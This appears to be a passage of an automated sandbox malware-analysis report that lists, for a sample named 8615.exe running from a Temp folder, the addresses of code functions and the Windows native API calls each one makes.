Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4B9900 ZwOpenEvent, 24_2_6B4B9900
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B515100 RtlAssert,RtlCaptureContext,DbgPrintEx,DbgPrompt,ZwTerminateThread,DbgPrintEx,RtlAssert,ZwTerminateProcess, 24_2_6B515100
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B494120 RtlAllocateHeap,memmove,memmove,RtlPrefixUnicodeString,RtlAllocateHeap,RtlLeaveCriticalSection,ZwClose,RtlFreeHeap,RtlFreeHeap, 24_2_6B494120
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B50193B ZwRaiseException,ZwTerminateProcess, 24_2_6B50193B
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4B9920 ZwDuplicateToken, 24_2_6B4B9920
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B54F13B ZwOpenKey,ZwCreateKey, 24_2_6B54F13B
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4BA130 ZwCreateWaitCompletionPacket, 24_2_6B4BA130
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B5019C8 ZwCreateSection,ZwMapViewOfSection,memset,ZwUnmapViewOfSection,ZwClose, 24_2_6B5019C8
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B5489E7 RtlGetCurrentServiceSessionId,ZwTraceEvent, 24_2_6B5489E7
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B49C182 RtlGetCurrentServiceSessionId,RtlAcquireSRWLockExclusive,RtlReleaseSRWLockExclusive,RtlReleaseSRWLockExclusive,RtlReleaseSRWLockExclusive,RtlReleaseSRWLockExclusive,RtlReleaseSRWLockExclusive,ZwWaitForAlertByThreadId,RtlAcquireSRWLockExclusive, 24_2_6B49C182
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4B9980 ZwCreateEvent, 24_2_6B4B9980
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4BB180 ZwWaitForAlertByThreadId, 24_2_6B4BB180
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B526186 ZwQueryValueKey,memmove,RtlInitUnicodeString, 24_2_6B526186
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B47519E RtlEqualUnicodeString,RtlLeaveCriticalSection,ZwClose,RtlFreeHeap, 24_2_6B47519E
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B53A189 RtlAcquireSRWLockExclusive,ZwGetNlsSectionPtr,RtlAllocateHeap,RtlFreeHeap,RtlReleaseSRWLockExclusive,RtlReleaseSRWLockExclusive, 24_2_6B53A189
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4B9990 ZwQueryVolumeInformationFile, 24_2_6B4B9990
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B54F1B5 RtlAllocateHeap,ZwQueryValueKey,memcpy,RtlFreeHeap, 24_2_6B54F1B5
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4BB1A0 ZwWaitForKeyedEvent, 24_2_6B4BB1A0
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4F51BE ZwQuerySystemInformation,ZwQuerySystemInformationEx,RtlAllocateHeap,ZwQuerySystemInformationEx,RtlFindCharInUnicodeString,RtlEnterCriticalSection,memcpy, 24_2_6B4F51BE
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4AC9BF DbgPrintEx,wcsrchr,memcpy,DbgPrintEx,ZwClose,DbgPrintEx,DbgPrintEx,RtlDosPathNameToRelativeNtPathName_U,DbgPrintEx,ZwOpenFile,ZwClose,RtlFreeHeap,DbgPrintEx,DbgPrintEx,DbgPrintEx,RtlDeleteBoundaryDescriptor,ZwClose,RtlFreeHeap, 24_2_6B4AC9BF
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B5349A4 ZwAllocateVirtualMemory,RtlCompareMemory,memcpy,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint, 24_2_6B5349A4
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4BA9B0 ZwQueryLicenseValue, 24_2_6B4BA9B0
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4B9840 ZwDelayExecution, 24_2_6B4B9840
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B548858 ZwAlertThreadByThreadId, 24_2_6B548858
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B475050 RtlSetCurrentDirectory_U,RtlAllocateHeap,RtlFreeHeap,RtlEnterCriticalSection,RtlLeaveCriticalSection,ZwClose,RtlFreeHeap,RtlSetCurrentDirectory_U,RtlFreeHeap,RtlFreeHeap, 24_2_6B475050
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4B9850 ZwQueryDirectoryFile, 24_2_6B4B9850
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B48106F ZwOpenKey,ZwClose, 24_2_6B48106F
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B501879 ZwAllocateVirtualMemory,memset,RtlInitializeSid, 24_2_6B501879
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B54F019 RtlInitUnicodeString,RtlInitUnicodeString,ZwQueryValueKey,RtlAllocateHeap,ZwQueryValueKey,RtlInitUnicodeString,ZwClose,RtlFreeHeap, 24_2_6B54F019
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B47F018 RtlAllocateHeap,ZwQueryValueKey,memcpy,RtlFreeHeap, 24_2_6B47F018
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4A4020 RtlGetVersion,RtlGetSuiteMask,RtlGetNtProductType,RtlInitUnicodeString,ZwQueryLicenseValue,RtlGetSuiteMask,RtlGetVersion, 24_2_6B4A4020
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4B9830 ZwOpenFile, 24_2_6B4B9830
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4770C0 ZwClose,RtlFreeHeap,RtlFreeHeap, 24_2_6B4770C0
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4B00C2 ZwAlertThreadByThreadId, 24_2_6B4B00C2
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4B98D0 ZwQueryAttributesFile, 24_2_6B4B98D0
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4BA0D0 ZwCreateTimer2, 24_2_6B4BA0D0
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4B10D7 ZwOpenKey,ZwCreateKey, 24_2_6B4B10D7
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B47B8F0 TpSetPoolStackInformation,ZwSetInformationWorkerFactory, 24_2_6B47B8F0
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4740FD RtlImageNtHeaderEx,DbgPrintEx,memset,RtlDebugPrintTimes,DbgPrintEx,wcsstr,DbgPrintEx,DbgPrintEx,wcschr,DbgPrintEx,ZwSetInformationProcess, 24_2_6B4740FD
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B5260E9 ZwOpenKey,ZwClose,ZwClose, 24_2_6B5260E9
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B52E0E9 RtlInitUnicodeString,ZwOpenKey,RtlInitUnicodeString,RtlAllocateHeap,ZwClose,RtlFreeHeap, 24_2_6B52E0E9
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4B108B ZwClose, 24_2_6B4B108B
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B473880 TpSetWaitEx,RtlAllocateHeap,ZwGetCompleteWnfStateSubscription,RtlFreeHeap,TpSetWaitEx, 24_2_6B473880
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4AA080 RtlDeleteCriticalSection,RtlAcquireSRWLockExclusive,RtlDeleteCriticalSection,RtlDeleteCriticalSection,ZwClose,RtlDeleteCriticalSection, 24_2_6B4AA080
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B49E090 RtlWow64EnableFsRedirectionEx,RtlEnterCriticalSection,RtlLeaveCriticalSection,ZwSetEvent, 24_2_6B49E090
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4BA890 ZwQueryDebugFilterState, 24_2_6B4BA890
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4B9890 ZwFsControlFile, 24_2_6B4B9890
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B49F0AE ZwSetInformationWorkerFactory, 24_2_6B49F0AE
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B5260A2 ZwQueryInformationFile, 24_2_6B5260A2
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4A18B9 ZwCreateTimer2,ZwCreateWaitCompletionPacket,ZwAssociateWaitCompletionPacket,ZwClose, 24_2_6B4A18B9
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4AF0BF ZwOpenFile,RtlFreeHeap,ZwQueryVolumeInformationFile,RtlAllocateHeap,memcpy,ZwClose,ZwClose,RtlFreeHeap, 24_2_6B4AF0BF
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4BB0B0 ZwTraceControl, 24_2_6B4BB0B0
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4A174B ZwFreeVirtualMemory,RtlFlushSecureMemoryCache,ZwFreeVirtualMemory, 24_2_6B4A174B
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4B0F48 ZwOpenKey,ZwClose,ZwClose,ZwCreateKey,RtlInitUnicodeStringEx,ZwSetValueKey,RtlInitUnicodeStringEx,ZwSetValueKey,ZwClose, 24_2_6B4B0F48
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4FA746 ZwGetCachedSigningLevel,ZwCompareSigningLevels,ZwSetCachedSigningLevel, 24_2_6B4FA746
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4B9740 ZwOpenThreadToken, 24_2_6B4B9740
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B505F5F RtlInitUnicodeString,ZwOpenFile,ZwClose,RtlFreeHeap,RtlFreeHeap,RtlAllocateHeap,RtlInitUnicodeString,ZwQueryDirectoryFile,RtlAllocateHeap,memcpy,RtlFreeHeap,ZwClose, 24_2_6B505F5F
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4B9750 ZwQueryInformationThread, 24_2_6B4B9750
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4ACF6A memcpy,memcpy,RtlDosPathNameToRelativeNtPathName_U,ZwOpenFile,memcpy,RtlFreeHeap,RtlDeleteBoundaryDescriptor,DbgPrintEx,DbgPrintEx,DbgPrintEx,ZwClose,RtlFreeHeap,DbgPrintEx,memcpy,DbgPrintEx,ZwClose, 24_2_6B4ACF6A
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B52CF70 RtlpGetUserOrMachineUILanguage4NLS,RtlInitUnicodeString,RtlInitUnicodeString,ZwOpenKey,RtlInitUnicodeString,ZwClose,RtlInitUnicodeString,ZwOpenKey,RtlInitUnicodeString,ZwClose,ZwClose, 24_2_6B52CF70
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B476F60 RtlGetPersistedStateLocation,ZwOpenKey,memcpy,RtlGetPersistedStateLocation,RtlInitUnicodeString,ZwOpenKey,RtlInitUnicodeString,RtlAllocateHeap,ZwQueryValueKey,RtlExpandEnvironmentStrings,memcpy,ZwClose,ZwClose,RtlFreeHeap, 24_2_6B476F60
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4BAF60 ZwSetTimer2, 24_2_6B4BAF60
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4B9F70 ZwCreateIoCompletion, 24_2_6B4B9F70
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4B9770 ZwSetInformationFile, 24_2_6B4B9770
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B50176C ZwOpenEvent,ZwWaitForSingleObject,ZwClose, 24_2_6B50176C
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B548F6A RtlGetCurrentServiceSessionId,ZwTraceEvent, 24_2_6B548F6A
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B506715 memset,memcpy,ZwTraceEvent, 24_2_6B506715
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4A9702 RtlAcquireSRWLockExclusive,RtlReleaseSRWLockExclusive,ZwReleaseWorkerFactoryWorker, 24_2_6B4A9702
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4B9710 ZwQueryInformationToken, 24_2_6B4B9710
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B52CF30 ZwAlertThreadByThreadId, 24_2_6B52CF30
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4AE730 RtlDecodePointer,ZwQueryInformationProcess,RtlRaiseStatus,RtlAllocateAndInitializeSid,RtlAllocateHeap,RtlAllocateAndInitializeSid,RtlAllocateAndInitializeSid,RtlAllocateAndInitializeSid, 24_2_6B4AE730
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4B9730 ZwQueryVirtualMemory, 24_2_6B4B9730
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4AD7CA RtlImageNtHeader,RtlFreeHeap,ZwCreateSection,ZwMapViewOfSection,ZwClose,RtlImageNtHeader,ZwClose,RtlFreeHeap,ZwClose,ZwClose,ZwUnmapViewOfSection, 24_2_6B4AD7CA
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B47F7C0 EtwNotificationUnregister,RtlAcquireSRWLockExclusive,RtlReleaseSRWLockExclusive,ZwClose,RtlReleaseSRWLockExclusive,RtlSetLastWin32Error,EtwNotificationUnregister, 24_2_6B47F7C0
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4B97C0 ZwTerminateProcess, 24_2_6B4B97C0
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4ADFDF RtlWakeAddressAllNoFence,ZwAlertThreadByThreadId,RtlWakeAddressAllNoFence, 24_2_6B4ADFDF
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4BAFD0 ZwShutdownWorkerFactory, 24_2_6B4BAFD0
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4A37EB RtlImageNtHeader,RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,ZwCreateIoCompletion,ZwCreateWorkerFactory,RtlAcquireSRWLockExclusive,RtlGetCurrentServiceSessionId,ZwSetInformationWorkerFactory, 24_2_6B4A37EB
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B480FFD RtlInitUnicodeString,ZwQueryValueKey, 24_2_6B480FFD
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B500FEC ZwDuplicateObject,ZwDuplicateObject, 24_2_6B500FEC
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B505780 DbgPrompt,ZwWow64DebuggerCall, 24_2_6B505780
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B525F87 ZwUnmapViewOfSection, 24_2_6B525F87
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4AFF9C RtlInitUnicodeString,ZwOpenKey,RtlInitUnicodeString,RtlInitUnicodeString, 24_2_6B4AFF9C
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4FA7AC ZwCompareSigningLevels,ZwCompareSigningLevels, 24_2_6B4FA7AC
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4B97A0 ZwUnmapViewOfSection, 24_2_6B4B97A0
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4B3FA0 RtlGetLocaleFileMappingAddress,ZwInitializeNlsFiles,RtlGetLocaleFileMappingAddress,ZwUnmapViewOfSection, 24_2_6B4B3FA0
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B472FB0 RtlDestroyHeap,RtlDeleteCriticalSection,RtlGetCurrentServiceSessionId,RtlGetCurrentServiceSessionId,RtlGetCurrentServiceSessionId,RtlDestroyHeap,DbgPrint,DbgPrint,DbgPrint,RtlDebugPrintTimes,RtlGetCurrentServiceSessionId,RtlGetCurrentServiceSessionId,ZwTraceEvent,RtlGetCurrentServiceSessionId,ZwTraceEvent, 24_2_6B472FB0
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B506652 ZwClose,RtlAllocateHeap,memcpy,ZwUnmapViewOfSection, 24_2_6B506652
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4BB640 RtlUnhandledExceptionFilter,ZwTerminateProcess, 24_2_6B4BB640
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4BB650 RtlUnhandledExceptionFilter,ZwTerminateProcess, 24_2_6B4BB650
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4B9650 ZwQueryValueKey, 24_2_6B4B9650
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4ABE62 ZwProtectVirtualMemory,RtlGetCurrentTransaction,RtlGetCurrentTransaction, 24_2_6B4ABE62
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4BAE70 ZwSetInformationWorkerFactory, 24_2_6B4BAE70
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4B9670 ZwQueryInformationProcess, 24_2_6B4B9670
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B502E14 RtlGetCurrentServiceSessionId,ZwTraceEvent, 24_2_6B502E14
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B47C600 LdrQueryImageFileKeyOption,RtlInitUnicodeStringEx,ZwQueryValueKey,LdrQueryImageFileKeyOption,RtlFreeHeap,RtlAllocateHeap,ZwQueryValueKey,RtlFreeHeap,RtlUnicodeStringToInteger,memcpy, 24_2_6B47C600
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4B2E1C RtlInitializeCriticalSectionEx,ZwDelayExecution, 24_2_6B4B2E1C
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4B9610 ZwEnumerateValueKey, 24_2_6B4B9610
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4B9E20 ZwCancelTimer2, 24_2_6B4B9E20
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B52FE3F memset,RtlGetCurrentServiceSessionId,ZwTraceEvent, 24_2_6B52FE3F
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B543E22 ZwTraceControl,RtlNtStatusToDosError,RtlAcquireSRWLockExclusive,RtlReleaseSRWLockExclusive,RtlSetLastWin32Error, 24_2_6B543E22
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B47B630 ZwWaitForKeyedEvent, 24_2_6B47B630
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4B9E30 ZwCancelWaitCompletionPacket, 24_2_6B4B9E30
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B548ED6 RtlGetCurrentServiceSessionId,ZwTraceEvent, 24_2_6B548ED6
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4B96C0 ZwSetInformationProcess, 24_2_6B4B96C0
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4766D4 RtlInitUnicodeString,ZwQueryValueKey, 24_2_6B4766D4
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4A9ED0 RtlReleaseSRWLockExclusive,RtlReleaseSRWLockShared,RtlAcquireSRWLockExclusive,RtlAcquireSRWLockShared,RtlReleaseSRWLockExclusive,RtlReleaseSRWLockShared,ZwWaitForAlertByThreadId, 24_2_6B4A9ED0
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4B96D0 ZwCreateKey, 24_2_6B4B96D0
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B472ED8 ZwWaitForAlertByThreadId,ZwWaitForAlertByThreadId, 24_2_6B472ED8
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B5016FA ZwQueryWnfStateNameInformation,ZwUpdateWnfStateData,EtwEventWriteNoRegistration, 24_2_6B5016FA
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4B96E0 ZwFreeVirtualMemory, 24_2_6B4B96E0
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B49E6F9 ZwAlpcSetInformation, 24_2_6B49E6F9
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4876FE RtlInitUnicodeString,RtlAppendUnicodeToString,RtlAppendUnicodeToString,RtlAppendUnicodeToString,ZwOpenKey,ZwClose, 24_2_6B4876FE
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B47B6F0 EtwEventWriteNoRegistration,ZwTraceEvent,RtlNtStatusToDosError, 24_2_6B47B6F0
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4CDEF0 RtlRaiseException,RtlCaptureContext,ZwRaiseException,RtlRaiseStatus, 24_2_6B4CDEF0
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B473E80 RtlSetThreadSubProcessTag,RtlGetCurrentServiceSessionId,RtlSetThreadSubProcessTag,RtlGetCurrentServiceSessionId,ZwTraceEvent, 24_2_6B473E80
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B52BE9B RtlAcquireSRWLockExclusive,ZwAllocateVirtualMemory,RtlReleaseSRWLockExclusive, 24_2_6B52BE9B
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4ADE9E RtlAcquireSRWLockExclusive,RtlAcquireSRWLockExclusive,RtlGetCurrentServiceSessionId,ZwUnsubscribeWnfStateChange,RtlReleaseSRWLockExclusive,RtlFreeHeap,RtlReleaseSRWLockExclusive,RtlReleaseSRWLockExclusive,RtlFreeHeap, 24_2_6B4ADE9E
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B472E9F ZwCreateEvent,ZwClose, 24_2_6B472E9F
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B543EBC ZwTraceControl,RtlNtStatusToDosError,RtlSetLastWin32Error, 24_2_6B543EBC
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4B9EA0 ZwCompareSigningLevels, 24_2_6B4B9EA0
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B502EA3 RtlGetCurrentServiceSessionId,ZwTraceEvent, 24_2_6B502EA3
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B49E6B0 RtlSetThreadWorkOnBehalfTicket,memcmp,ZwSetInformationThread,RtlSetThreadWorkOnBehalfTicket, 24_2_6B49E6B0
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B541D55 ZwFreeVirtualMemory,RtlWakeAddressAllNoFence, 24_2_6B541D55
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4A0548 RtlEnterCriticalSection,RtlLeaveCriticalSection,RtlRbInsertNodeEx,ZwQueryVirtualMemory, 24_2_6B4A0548
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B501D43 ZwQueryInformationThread, 24_2_6B501D43
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B501570 ZwQuerySystemInformation,RtlInitUnicodeString,memset,ZwAlpcConnectPort,ZwAlpcSendWaitReceivePort,ZwClose, 24_2_6B501570
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B536D61 ZwAllocateVirtualMemoryEx, 24_2_6B536D61
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B501D6A ZwWaitForMultipleObjects, 24_2_6B501D6A
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4B9D70 ZwAlpcQueryInformation, 24_2_6B4B9D70
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B501D0B ZwSetInformationProcess, 24_2_6B501D0B
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4BAD10 ZwSetCachedSigningLevel, 24_2_6B4BAD10
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B548D34 RtlGetCurrentServiceSessionId,ZwTraceEvent, 24_2_6B548D34
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4A1520 RtlInitializeCriticalSectionEx,RtlInitializeCriticalSectionEx,RtlGetCurrentServiceSessionId,ZwTraceEvent, 24_2_6B4A1520
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4B9520 ZwWaitForSingleObject, 24_2_6B4B9520
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B52FD22 ZwQueryInformationProcess,RtlUniform, 24_2_6B52FD22
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4A4D3B memset,RtlRunOnceExecuteOnce,ZwTraceControl,memcmp,RtlNtStatusToDosError,RtlFreeHeap,RtlAllocateHeap,RtlNtStatusToDosError,RtlFreeHeap, 24_2_6B4A4D3B
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B52FDD3 RtlGetCurrentServiceSessionId,ZwTraceEvent, 24_2_6B52FDD3
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B474DC0 RtlpUnWaitCriticalSection,RtlWakeAddressAllNoFence,RtlRaiseStatus,TpWaitForAlpcCompletion,RtlpUnWaitCriticalSection,ZwSetEvent,TpWaitForAlpcCompletion,ZwAlpcQueryInformation, 24_2_6B474DC0
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4B95C0 ZwSetEvent, 24_2_6B4B95C0
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B49EDC4 ZwCancelWaitCompletionPacket, 24_2_6B49EDC4
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4745D0 RtlGetThreadWorkOnBehalfTicket,RtlGetThreadWorkOnBehalfTicket,ZwQueryInformationThread, 24_2_6B4745D0
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4B95D0 ZwClose, 24_2_6B4B95D0
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B52BDFA RtlAcquireSRWLockExclusive,ZwAllocateVirtualMemory,RtlReleaseSRWLockExclusive, 24_2_6B52BDFA
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4B9DE0 ZwAssociateWaitCompletionPacket, 24_2_6B4B9DE0
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4795F0 TpSetPoolMinThreads,ZwSetInformationWorkerFactory,RtlGetCurrentServiceSessionId,TpSetPoolMinThreads, 24_2_6B4795F0
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4B95F0 ZwQueryInformationFile, 24_2_6B4B95F0
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B48DD80 RtlAcquireSRWLockShared,ZwQueryVirtualMemory,RtlImageNtHeaderEx,RtlImageNtHeaderEx,RtlImageNtHeaderEx,RtlRaiseStatus,RtlAddressInSectionTable,RtlImageDirectoryEntryToData, 24_2_6B48DD80
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B531582 ZwTraceEvent, 24_2_6B531582
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B53B581 RtlGetCurrentServiceSessionId,RtlGetCurrentServiceSessionId,RtlGetCurrentServiceSessionId,ZwTraceEvent, 24_2_6B53B581
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B473591 ZwSetInformationFile, 24_2_6B473591
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4765A0 RtlpGetDeviceFamilyInfoEnum,RtlInitUnicodeString,ZwQueryLicenseValue,RtlInitUnicodeString,ZwOpenKey,ZwClose,RtlGetDeviceFamilyInfoEnum,RtlInitUnicodeString,ZwOpenKey,ZwClose,RtlGetVersion, 24_2_6B4765A0
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4B9DA0 ZwAlpcSendWaitReceivePort, 24_2_6B4B9DA0
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4B95B0 ZwSetInformationThread, 24_2_6B4B95B0
